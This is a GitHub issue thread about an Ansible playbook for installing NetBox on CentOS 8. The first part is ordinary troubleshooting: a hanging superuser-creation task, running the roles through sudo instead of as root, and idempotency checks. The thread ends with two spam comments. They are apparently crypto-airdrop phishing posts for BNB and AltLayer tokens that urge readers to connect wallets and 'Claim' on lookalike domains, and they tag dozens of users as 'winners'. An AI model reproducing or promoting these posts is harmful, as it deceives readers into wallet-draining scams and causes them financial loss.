### ISSUE TITLE
installing netbox

### ISSUE THREAD

**Issue by andrewm659** [adamwoolhether/NetBox4CentOS8#1]
So after seeing your comment in the netbox repo issues I have downloaded your ansible playbook.  However I am heavily modifying it to look like a traditional ansible playbook that you would find on ansible galaxy.  I have been testing while going through this and have hit a snag.  Also I have broken up the playbook into smaller files and made include statements.  Instead of running AS the actual root user, I run the playbook as my used but I have full sudo permissions which results in LOTS of become statements.

I am at this point:
TASK [netbox1 : CREATE SUPER USER] ********************************************************************************************************************************************************************************
task path: /opt/syseng/automation/ansible/playbooks/roles/netbox1/tasks/netbox.yml

The playbook is just sitting there.  I am not sure the variable is being passed properly.

**Comment by adamwoolhether** [comment]
@andrewm659 I'd have to see your modified .yaml code to accurately diagnose the situation.

Have you tried running the playbook as-is on a fresh CentOS system?

**Comment by andrewm659** [comment]
So I got it working.  And yes that was the issue.  There needs to be more logic in it to check for the super user and either destroy the database and reload it or ignore it and move on.

**Comment by andrewm659** [comment]
Also need the plugins...

**Comment by adamwoolhether** [comment]
@andrewm659 I totally agree. The command modules are not ideal, but I'm not sure how else to execute ansible commands within a target host's virtual environment. As such, I've loosely checked if the Netbox upgrade.sh has been executed before and placed the relevant tasks within a conditional block.

The "GENERATE SELF-SIGNED CERTIFICATE" task can also be improved. I know there is a proper module, but there are many crypto modules and crypto isn't my area of expertise, so I simply run the command after ensuring a key doesn't already exist.

Please feel free to contribute/improve

**Comment by andrewm659** [comment]
Let me create a separate repo. I'll show you what I did.

**Comment by adamwoolhether** [comment]
> https://github.com/andrewm659/ansible-role-netbox

Regarding conditional logic, i'm not quite sure what you've done different? Can you point it out for me?

It seems you've just separated the plays into various role task-files.

**Comment by andrewm659** [comment]
It also doesn't have to run as root anymore but as a user with elevated privileges.  And yes I did basically separate out into tasks.

**Comment by sarawutp** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @kienv2b, @umberto12345, @tahaismail12, @ajifirman, @ubearline, @aiwujiwudeguyue, @Erkansukgen

**Comment by technosoft-admin** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @zars771, @gpellegrini87, @sktech150897, @Abnerfang, @yydeyimi, @Ramadhani93, @brnskn, @Nehaislam980, @Tonland088888, @thenv95, @shocktn, @liqunn, @bimookta, @Blackcol, @CrisSArenas, @mine-27, @hspadim-at-dunamis, @mylittlegh, @ramesh784, @Bspring305, @Fredrexee, @mcbarin, @pedrodeoliveira, @sagargulabani, @tori-9, @jeojoe, @Georgezhang714, @skyhuihui, @Asghar100, @mulyadi36
